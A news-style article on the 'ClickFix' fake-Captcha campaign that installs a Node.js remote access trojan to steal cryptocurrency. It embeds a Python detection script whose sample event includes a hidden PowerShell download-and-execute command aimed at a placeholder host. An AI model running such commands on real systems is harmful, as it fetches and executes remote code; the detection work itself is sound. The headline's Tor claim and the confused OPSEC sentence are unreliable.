New Node.js Malware Spreads Through Tor Network to Steal Cryptocurrency
Cryptocurrency Scam ‘ClickFix’ Exposes Vulnerability in Human Interaction
A sophisticated scheme to pilfer cryptocurrencies from unsuspecting Windows users has been identified, with the malicious operation dubbed “ClickFix”. This operation exploits a vulnerability in the way people interact with websites.
Fake Captchas Trigger PowerShell Command
The scammers embed fake Captchas on websites, triggering a PowerShell command to download and install a Remote Access Trojan (RAT) onto the victim’s device. The RAT, powered by a Node.js runtime, masquerades as a legitimate application called “LogicOptimizer.”
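From a detection standpoint, the useful signal in the paragraph above is the sequence it describes: a PowerShell command that downloads and executes a payload, followed by a Node.js runtime running under a "LogicOptimizer" name from a user profile directory. The following example is added here and is not code from the article or from any researcher it cites; it runs three simple rules over constructed process-creation events (Sysmon-style fields, sample values invented for this example, with an invalid placeholder domain). The rule that ties hidden-window PowerShell to an explorer.exe parent is an assumption about how such a command gets launched, not something the article states.

```python
import re

# Constructed process-creation events (simplified Sysmon Event ID 1 fields).
# These are illustrative samples written for this example, not data from the article.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -c \"iwr http://captcha.example.invalid/v | iex\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"Image": r"C:\Users\alice\AppData\Roaming\LogicOptimizer\node.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"node.exe C:\Users\alice\AppData\Roaming\LogicOptimizer\main.js"},
    {"Image": r"C:\Program Files\nodejs\node.exe",
     "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "CommandLine": r"node.exe C:\dev\app\server.js"},
]

# Common PowerShell download primitives (cmdlets, aliases and .NET calls).
DOWNLOAD = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"downloadfile|net\.webclient|\bcurl\b|\bwget\b)", re.I)
# Primitives that execute whatever was downloaded.
EXECUTE = re.compile(r"(invoke-expression|\biex\b|start-process|\bsaps\b)", re.I)
# Flags that hide the window or bypass policy; benign scripts rarely need them.
EVASION = re.compile(
    r"(-w(indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass|-enc(odedcommand)?\b)", re.I)
# User-writable locations from which a Node.js runtime normally has no reason to run.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\|\\temp\\|\\programdata\\", re.I)


def classify(event):
    """Return the names of the rules triggered by one process-creation event."""
    hits = []
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower()

    if image.endswith("powershell.exe") or image.endswith("pwsh.exe"):
        # Download-and-execute in a single command line: the "download and install" step.
        if DOWNLOAD.search(cmd) and EXECUTE.search(cmd):
            hits.append("powershell_download_cradle")
        # Assumption for this example: a hidden/bypass PowerShell spawned directly by the
        # desktop shell suggests a user-typed or pasted command rather than a scheduled task.
        if EVASION.search(cmd) and parent.endswith("explorer.exe"):
            hits.append("hidden_powershell_from_shell")

    # A Node.js runtime living under a user profile or temp directory, as a RAT
    # bundled with its own runtime would be; a system-wide install would not match.
    if image.endswith("node.exe") and USER_WRITABLE.search(image):
        hits.append("node_runtime_in_user_writable_dir")
    return hits


def scan(events):
    """Return (index, hits) pairs for every event that triggered at least one rule."""
    results = []
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["Image"], hits)
```

Run on the constructed events, the first (hidden PowerShell fetching and executing a remote script) and third (node.exe under AppData) are flagged; the maintenance script and the developer's system-wide Node.js install are not. The regexes are deliberately broad, so in production they belong behind an allow-list of known administrative scripts rather than as a standalone alert.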
Analysis and Tailoring of Actions
Upon execution, the RAT performs a thorough analysis of the compromised system, gathering information about the operating system version, CPU type, available RAM, and even the presence of anti-virus software. This analysis enables the malware to tailor its actions accordingly, avoiding detection by security programs such as Windows Defender, Kaspersky, Norton, and McAfee.
Malware-as-a-Service Venture
The ClickFix operation is not a solo effort but rather a Malware-as-a-Service (MaaS) venture, where affiliates rent a toolkit to conduct their own attacks. This approach allows the scammers to stay one step ahead of law enforcement agencies, whose efforts to disrupt the operation were ultimately unsuccessful due to an operational security (OPSEC) mistake by the attackers.
Communication and Control
Researchers discovered that the malware communicates with its Command and Control (C2) server through a protocol called gRPC, facilitating real-time monitoring and control of the infected devices. The C2 server also sends notifications to the affiliated scammers’ Telegram channels whenever a successful transaction occurs.
Expert Advice
Experts advise that users should exercise caution when encountering suspicious Captcha prompts, as they may indicate the presence of malicious software. Closing the browser tab immediately after detecting such anomalies can help prevent potential harm to one’s cryptocurrency wallet.
Authorities Remain Committed
Despite the sophistication of the ClickFix operation, authorities remain committed to dismantling the underlying infrastructure supporting this malicious activity. As the battle against cyber threats continues to evolve, users must remain vigilant and take proactive measures to safeguard their digital assets.
